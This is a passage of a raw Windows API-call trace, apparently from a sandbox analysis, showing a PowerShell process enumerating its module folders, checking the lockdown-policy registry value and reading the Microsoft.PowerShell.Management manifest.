lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", lpFilePart=0x0) returned 0x48 [0159.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.713] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbbc28, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.713] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0159.713] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", nBufferLength=0x37, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV", lpFilePart=0x0) returned 0x36 [0159.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.713] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\uev"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e5be8c, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x1fbcd58, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe966970b, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.714] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0159.714] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", nBufferLength=0x3d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient", lpFilePart=0x0) returned 0x3c [0159.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.714] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbd4ae, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.714] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0159.714] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", nBufferLength=0x38, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac", lpFilePart=0x0) returned 0x37 [0159.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.714] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205dc90, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.715] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4b [0159.715] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", nBufferLength=0x4b, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense", lpFilePart=0x0) returned 0x4a [0159.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.715] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205e730, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.715] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0159.715] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", nBufferLength=0x49, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting", lpFilePart=0x0) returned 0x48 [0159.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.715] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205efde, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.715] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0159.716] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", nBufferLength=0x41, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate", lpFilePart=0x0) returned 0x40 [0159.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.716] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205f3c7, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.716] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0159.716] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0159.716] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acb52e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d43d0 [0159.716] FindNextFileW (in: hFindFile=0x76d43d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acb52e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.716] FindNextFileW (in: hFindFile=0x76d43d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x983, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0159.717] FindNextFileW (in: hFindFile=0x76d43d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0159.717] FindNextFileW (in: hFindFile=0x76d43d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0159.717] FindClose (in: hFindFile=0x76d43d0 | out: hFindFile=0x76d43d0) returned 1 [0159.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.717] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0159.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.719] FindNextFileW (in: hFindFile=0x76d4350, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a686f1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.719] FindNextFileW (in: hFindFile=0x76d4350, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fef3047, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fef3047, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fef3047, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0159.720] FindNextFileW (in: hFindFile=0x76d4350, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fef3047, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fef3047, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fef3047, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0159.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.789] CoCreateGuid (in: pguid=0x86deb24 | out: pguid=0x86deb24*(Data1=0xd31628ec, Data2=0xda32, Data3=0x4fd5, Data4=([0]=0x87, [1]=0x70, [2]=0x2a, [3]=0x5c, [4]=0x80, [5]=0x7d, [6]=0x78, [7]=0x6c))) returned 0x0 [0159.925] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x40c [0159.931] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x410 [0159.931] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x790 [0159.931] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x78c [0159.931] SetEvent (hEvent=0x78c) returned 1 [0159.932] SetEvent (hEvent=0x40c) returned 1 [0159.932] SetEvent (hEvent=0x410) returned 1 [0159.932] SetEvent (hEvent=0x790) returned 1 [0159.934] AmsiCloseSession () returned 0x35b7d80 [0159.935] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b0 [0159.935] SetThreadUILanguage (LangId=0x0) returned 0xf00409 [0160.479] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86de7ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86de7ec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x3c, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0160.479] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86de758*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86de758*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2f, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0160.479] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86de7dc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x3c, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86de7dc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x3c, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0160.727] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0160.728] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0160.728] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0160.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86de5a4) returned 1 [0160.728] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86de620 | out: lpFileInformation=0x86de620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fef3047, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fef3047, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fef3047, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9ea)) returned 1 [0160.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86de5a0) returned 1 [0160.728] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0160.796] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0160.797] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0160.797] CoTaskMemAlloc (cb=0x20c) returned 0x13323c8 [0160.797] GetSystemDirectoryW (in: lpBuffer=0x13323c8, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0160.797] CoTaskMemFree (pv=0x13323c8) [0160.797] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0160.797] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0160.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86de208) returned 1 [0160.797] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x86de284 | out: lpFileInformation=0x86de284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0160.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86de204) returned 1 [0160.797] GetSystemInfo (in: lpSystemInfo=0x86de2b8 | out: lpSystemInfo=0x86de2b8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0160.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x86de248 | out: phkResult=0x86de248*=0x6f8) returned 0x0 [0160.798] RegQueryValueExW (in: hKey=0x6f8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x86de264, lpData=0x0, lpcbData=0x86de260*=0x0 | out: lpType=0x86de264*=0x0, lpData=0x0, lpcbData=0x86de260*=0x0) returned 0x2 [0160.798] RegCloseKey (hKey=0x6f8) returned 0x0 [0160.808] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0160.808] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0160.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86de1c0) returned 1 [0160.808] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6f8 [0160.808] GetFileType (hFile=0x6f8) returned 0x1 [0160.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86de1bc) returned 1 [0160.808] GetFileType (hFile=0x6f8) returned 0x1 [0160.872] SetFilePointer (in: hFile=0x6f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x86de1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x86de1fc*=0) returned 0x0 [0160.872] ReadFile (in: hFile=0x6f8, lpBuffer=0x53d7014, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de228, lpOverlapped=0x0 | out: lpBuffer=0x53d7014*, lpNumberOfBytesRead=0x86de228*=0x9ea, lpOverlapped=0x0) returned 1 [0160.873] SetFilePointer (in: hFile=0x6f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x86de1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x86de1fc*=0) returned 0x9ea [0160.874] ReadFile (in: hFile=0x6f8, lpBuffer=0x53d659e, nNumberOfBytesToRead=0x216, lpNumberOfBytesRead=0x86de228, lpOverlapped=0x0 | out: lpBuffer=0x53d659e*, lpNumberOfBytesRead=0x86de228*=0x0, lpOverlapped=0x0) returned 1 [0160.874] SetFilePointer (in: hFile=0x6f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x86de1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x86de1fc*=0) returned 0x9ea [0160.874] ReadFile (in: hFile=0x6f8, lpBuffer=0x53d7014, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x86de228, lpOverlapped=0x0 | out: lpBuffer=0x53d7014*, lpNumberOfBytesRead=0x86de228*=0x0, lpOverlapped=0x0) returned 1 [0160.874] CoTaskMemAlloc (cb=0x20c) returned 0x13323c8 [0160.874] GetSystemDirectoryW (in: lpBuffer=0x13323c8, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0160.876] CoTaskMemFree (pv=0x13323c8) [0160.876] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", 